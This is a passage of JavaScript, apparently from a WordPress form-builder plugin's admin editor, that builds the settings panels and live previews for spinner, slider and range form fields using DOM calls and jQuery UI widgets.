		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	
	edit_main_td3.appendChild(el_spinner_width_label);
	edit_main_td3_1.appendChild(el_spinner_width_input);
	
	edit_main_td4.appendChild(el_spinner_min_value_label);
	edit_main_td4_1.appendChild(el_spinner_min_value_input);

    edit_main_td5.appendChild(el_spinner_max_value_label);	
	edit_main_td5_1.appendChild(el_spinner_max_value_input);
	
	  edit_main_td6.appendChild(el_spinner_step_label);	
	edit_main_td6_1.appendChild(el_spinner_step_input);
	
	edit_main_td7.appendChild(el_style_label);
	edit_main_td7_1.appendChild(el_style_textarea);
	edit_main_td8.appendChild(el_required_label);
	edit_main_td8_1.appendChild(el_required);
	
	edit_main_td9.appendChild(el_attr_label);
	edit_main_td9.appendChild(el_attr_add);
	edit_main_td9.appendChild(br1);
	edit_main_td9.appendChild(el_attr_table);
	edit_main_td9.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_spinner');
	
//show table

	
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_spinner");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_width= document.createElement("input");
            adding_width.setAttribute("type", "hidden");
            adding_width.setAttribute("value", w_field_width);
            adding_width.setAttribute("name", i+"_spinner_widthform_id_temp");	
            adding_width.setAttribute("id", i+"_spinner_widthform_id_temp");		
			
	var adding_min_value = document.createElement("input");
           	 	adding_min_value.setAttribute("type", "hidden");
           	 	adding_min_value.setAttribute("value", w_field_min_value);
			adding_min_value.setAttribute("id", i+"_min_valueform_id_temp");
			adding_min_value.setAttribute("name", i+"_min_valueform_id_temp");
			
	var adding_max_value = document.createElement("input");
            adding_max_value.setAttribute("type", "hidden");
            adding_max_value.setAttribute("value", w_field_max_value);
            adding_max_value.setAttribute("name", i+"_max_valueform_id_temp");	
            adding_max_value.setAttribute("id", i+"_max_valueform_id_temp");
			
	var adding_step = document.createElement("input");
            adding_step.setAttribute("type", "hidden");
            adding_step.setAttribute("value", w_field_step);
            adding_step.setAttribute("name", i+"_stepform_id_temp");	
            adding_step.setAttribute("id", i+"_stepform_id_temp");


		
   var adding_spinner_input = document.createElement("input");
            adding_spinner_input.setAttribute("type", "");
            adding_spinner_input.setAttribute("value",'');
			adding_spinner_input.style.cssText="width:"+w_field_width+"px"; 
            adding_spinner_input.setAttribute("name", i+"_elementform_id_temp");	
            adding_spinner_input.setAttribute("id", i+"_elementform_id_temp");
			adding_spinner_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

     
			
		  var br1 = document.createElement('br');

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
		td2.appendChild(adding_width);
		td2.appendChild(adding_min_value);
      	td2.appendChild(adding_max_value);
		td2.appendChild(adding_step);
	    
	
		td2.appendChild(adding_spinner_input);
		
		
 	
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_spinner');

jQuery( "#"+i+"_elementform_id_temp" ).spinner();

 var spinner = jQuery( "#"+i+"_elementform_id_temp" ).spinner();


spinner.spinner( "value", w_field_value );
jQuery( "#"+i+"_elementform_id_temp" ).spinner({ min: w_field_min_value});    
jQuery( "#"+i+"_elementform_id_temp" ).spinner({ max: w_field_max_value});
jQuery( "#"+i+"_elementform_id_temp" ).spinner({ step: w_field_step});
}


function change_spinner_width(a,b,form_id){
document.getElementById( b+"_elementform_id_temp" ).style.cssText="width:"+a+"px";
document.getElementById( b+"_spinner_widthform_id_temp" ).value=a;
}


function change_spinner_max_value(a,b,form_id){
jQuery( "#"+b+"_elementform_id_temp" ).spinner({ max: a});
document.getElementById( b+"_max_valueform_id_temp" ).value=a;
}

function change_spinner_min_value(a,b,form_id){
jQuery( "#"+b+"_elementform_id_temp" ).spinner({ min: a});
document.getElementById( b+"_min_valueform_id_temp" ).value=a;

}

function change_spinner_step(a,b,form_id){
jQuery( "#"+b+"_elementform_id_temp" ).spinner({ step: a});
document.getElementById( b+"_stepform_id_temp" ).value=a;
}



function type_slider(i, w_field_label, w_field_label_pos,  w_field_width, w_field_min_value, w_field_max_value, w_field_value, w_required, w_class, w_attr_name, w_attr_value){

  document.getElementById("element_type").value="type_slider";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
	var edit_main_tr8  = document.createElement('tr');
      	edit_main_tr8.setAttribute("valing", "top");
	

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	
				
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
		
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
				
				
	var el_slider_size_label = document.createElement('label');
	        el_slider_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_slider_size_label.innerHTML = "Width";			
				
    var el_slider_size_input = document.createElement('input');
                el_slider_size_input.setAttribute("type", "text");		
                el_slider_size_input.setAttribute("id", "edit_for_slider_width");		
                el_slider_size_input.setAttribute("value", w_field_width);
                el_slider_size_input.style.cssText = "width:100px;";	
				el_slider_size_input.setAttribute("onKeyPress", "return check_isnum(event)");	
			   el_slider_size_input.setAttribute("onKeyUp", "change_slider_width(this.value,"+i+",'form_id_temp')");
	
	var el_slider_min_value_label = document.createElement('label');
				el_slider_min_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_slider_min_value_label.innerHTML = "Min Value ";
	
	var el_slider_min_value_input = document.createElement('input');
                el_slider_min_value_input.setAttribute("type", "text");		
                el_slider_min_value_input.setAttribute("id", "edit_for_slider_min_value");		
                el_slider_min_value_input.setAttribute("value", w_field_min_value);
                el_slider_min_value_input.style.cssText = "width:100px;";	
				el_slider_min_value_input.setAttribute("onKeyPress", "return check_isnum(event)");	
				el_slider_min_value_input.setAttribute("onKeyUp", "change_slider_min_or_max_value(this.value,"+i+",'form_id_temp','min')");
			   el_slider_min_value_input.setAttribute("onChange", "change_slider_min_value(this.value,"+i+",'form_id_temp')");
           
		   
	var el_slider_max_value_label = document.createElement('label');
				el_slider_max_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_slider_max_value_label.innerHTML = "Max Value ";
	
	var el_slider_max_value_input = document.createElement('input');
                el_slider_max_value_input.setAttribute("type", "text");		
                el_slider_max_value_input.setAttribute("id", "edit_for_slider_max_value");		
                el_slider_max_value_input.setAttribute("value", w_field_max_value);
                el_slider_max_value_input.style.cssText = "width:100px;";	
				el_slider_max_value_input.setAttribute("onKeyPress", "return check_isnum(event)");	
				el_slider_max_value_input.setAttribute("onKeyUp", "change_slider_min_or_max_value(this.value,"+i+",'form_id_temp','max')");
			   el_slider_max_value_input.setAttribute("onChange", "change_slider_max_value(this.value,"+i+",'form_id_temp')");
           
	

	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_slider')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_slider')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_slider')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_slider')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_slider_size_label);	
	edit_main_td3_1.appendChild(el_slider_size_input);
	
	edit_main_td4.appendChild(el_slider_min_value_label);
	edit_main_td4_1.appendChild(el_slider_min_value_input);
	
	
	edit_main_td5.appendChild(el_slider_max_value_label);
	edit_main_td5_1.appendChild(el_slider_max_value_input);

    
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	edit_main_td7.appendChild(el_required_label);
	edit_main_td7_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br1);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_slider');
	
//show table

	
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_slider");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_slider_min_value = document.createElement("input");
           	 	adding_slider_min_value.setAttribute("type", "hidden");
           	 	adding_slider_min_value.setAttribute("value", w_field_min_value);
			adding_slider_min_value.setAttribute("id", i+"_slider_min_valueform_id_temp");
			adding_slider_min_value.setAttribute("name", i+"_slider_min_valueform_id_temp");		
			
	var adding_slider_max_value = document.createElement("input");
           	 	adding_slider_max_value.setAttribute("type", "hidden");
           	 	adding_slider_max_value.setAttribute("value", w_field_max_value);
			adding_slider_max_value.setAttribute("id", i+"_slider_max_valueform_id_temp");
			adding_slider_max_value.setAttribute("name", i+"_slider_max_valueform_id_temp");
			
			
	var adding_slider_value = document.createElement("input");
           	 	adding_slider_value.setAttribute("type", "hidden");
           	 	adding_slider_value.setAttribute("value", w_field_value);
			adding_slider_value.setAttribute("id", i+"_slider_valueform_id_temp");
			adding_slider_value.setAttribute("name", i+"_slider_valueform_id_temp");

			
	var adding_slider_width = document.createElement("input");
            adding_slider_width.setAttribute("type", "hidden");
            adding_slider_width.setAttribute("value", w_field_width);
            adding_slider_width.setAttribute("name", i+"_slider_widthform_id_temp");	
            adding_slider_width.setAttribute("id", i+"_slider_widthform_id_temp");
			
    var adding_slider_div = document.createElement("div");
			adding_slider_div.style.cssText="width:"+w_field_width+"px"; 
            adding_slider_div.setAttribute("name", i+"_elementform_id_temp");	
            adding_slider_div.setAttribute("id", i+"_elementform_id_temp");

	

			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
			
		var slider_table = document.createElement('table');
           	slider_table.setAttribute("id", i+"_slider_tableform_id_temp");	
			
		var slider_tr1 = document.createElement('tr');	
		var slider_tr2 = document.createElement('tr');	
		
	    var slider_td1 = document.createElement('td');
         	slider_td1.setAttribute("colspan", '3');
           	slider_td1.setAttribute("id", i+"_slider_td1form_id_temp");
			
        var slider_td2 = document.createElement('td');
         	  slider_td2.setAttribute("align", 'left');
           	slider_td2.setAttribute("id", i+"_slider_td2form_id_temp");
				
			
		var slider_td3 = document.createElement('td');
            slider_td3.setAttribute("align", 'right');
           	slider_td3.setAttribute("id", i+"_slider_td3form_id_temp");
			
		var slider_td4 = document.createElement('td');
            slider_td4.setAttribute("align", 'right');
           	slider_td4.setAttribute("id", i+"_slider_td4form_id_temp");		
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      
			
		  var br1 = document.createElement('br');

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
		td2.appendChild(adding_slider_width);
	    td2.appendChild(adding_slider_min_value);
		td2.appendChild(adding_slider_max_value); 
		td2.appendChild(adding_slider_value); 
		
        var slider_min = document.createElement('span');
			slider_min.setAttribute("id", i+"_element_minform_id_temp");
			slider_min.innerHTML = w_field_min_value;
			slider_min.setAttribute("class", "label");
			
		var slider_max = document.createElement('span');
			slider_max.setAttribute("id", i+"_element_maxform_id_temp");
			slider_max.innerHTML = w_field_max_value;
			slider_max.setAttribute("class", "label");
		
        var slider_value = document.createElement('span');
			slider_value.setAttribute("id", i+"_element_valueform_id_temp");
			slider_value.innerHTML = w_field_value;
			slider_value.setAttribute("class", "label");		
	
	
		slider_td1.appendChild(adding_slider_div);
		slider_tr1.appendChild(slider_td1);
		slider_table.appendChild(slider_tr1);
		
		
		slider_td2.appendChild(slider_min);
        slider_tr2.appendChild(slider_td2);
	    slider_table.appendChild(slider_tr2);
		
		
		slider_td3.appendChild(slider_value);
        slider_tr2.appendChild(slider_td3);
	    slider_table.appendChild(slider_tr2);
		
		slider_td4.appendChild(slider_max);
        slider_tr2.appendChild(slider_td4);
	    slider_table.appendChild(slider_tr2);
		
		td2.appendChild(slider_table);
		
		
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_slider');
jQuery("#"+i+"_elementform_id_temp")[0].slide = null;

jQuery(function() {
	jQuery( "#"+i+"_elementform_id_temp").slider({
		range: "min",
		value: eval(w_field_value),
		min: eval(w_field_min_value),
		max: eval(w_field_max_value),
		slide: function( event, ui ) {
		document.getElementById( i+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
		document.getElementById( i+"_slider_valueform_id_temp" ).value = "" + ui.value; 	
		}
	});
	
	
});


}


function change_slider_min_or_max_value(a,b,form_id, min_or_max){ 
document.getElementById( b+"_element_"+min_or_max+"form_id_temp" ).innerHTML=a;
}


function change_slider_width(a,b,form_id){
document.getElementById( b+"_elementform_id_temp" ).style.cssText="width:"+a+"px";
document.getElementById( b+"_slider_widthform_id_temp" ).value=a;

}

function change_slider_min_value(a,b,form_id){
document.getElementById( b+"_slider_min_valueform_id_temp" ).value=a;
document.getElementById(b+"_slider_valueform_id_temp" ).value = a;
if(eval(a) > document.getElementById( b+"_element_valueform_id_temp" ).innerHTML){
document.getElementById( b+"_element_valueform_id_temp" ).innerHTML = a;

	jQuery( "#"+b+"_elementform_id_temp").slider({
			min: eval(a),
		slide: function( event, ui ) {
		document.getElementById(b+"_element_valueform_id_temp").innerHTML = "" + ui.value ;
		document.getElementById(b+"_slider_valueform_id_temp" ).value = "" + ui.value;
		}
	});

}
else{

jQuery( "#"+b+"_elementform_id_temp").slider({
		min: eval(a),
		slide: function( event, ui ) {
		document.getElementById(b+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
		document.getElementById(b+"_slider_valueform_id_temp" ).value = "" + ui.value;	
		}
	});

}

}

function change_slider_max_value(a,b,form_id){
document.getElementById( b+"_slider_max_valueform_id_temp" ).value=a;

if(eval(a) < parseInt(document.getElementById( b+"_slider_valueform_id_temp" ).value)){

document.getElementById( b+"_element_valueform_id_temp" ).innerHTML = a;
document.getElementById(b+"_slider_valueform_id_temp" ).value = a;
	jQuery( "#"+b+"_elementform_id_temp").slider({
		min: eval(document.getElementById(b+"_slider_min_valueform_id_temp" ).value),
		max: eval(a),
		value: eval(document.getElementById(b+"_slider_valueform_id_temp" ).value),
		slide: function( event, ui ) {
		document.getElementById(b+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
		document.getElementById(b+"_slider_valueform_id_temp" ).value = "" + ui.value;	
		}
	});
}
else{

jQuery( "#"+b+"_elementform_id_temp").slider({
        min: eval(document.getElementById(b+"_slider_min_valueform_id_temp" ).value),
		max: eval(a),
		value: eval(document.getElementById(b+"_slider_valueform_id_temp" ).value),
		slide: function( event, ui ) {
		document.getElementById(b+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
		document.getElementById(b+"_slider_valueform_id_temp" ).value = "" + ui.value;	
		}
	});

}
}



function type_range(i, w_field_label, w_field_label_pos, w_field_range_width, w_field_range_step, w_field_value1, w_field_value2, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value){

   document.getElementById("element_type").value="type_range";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
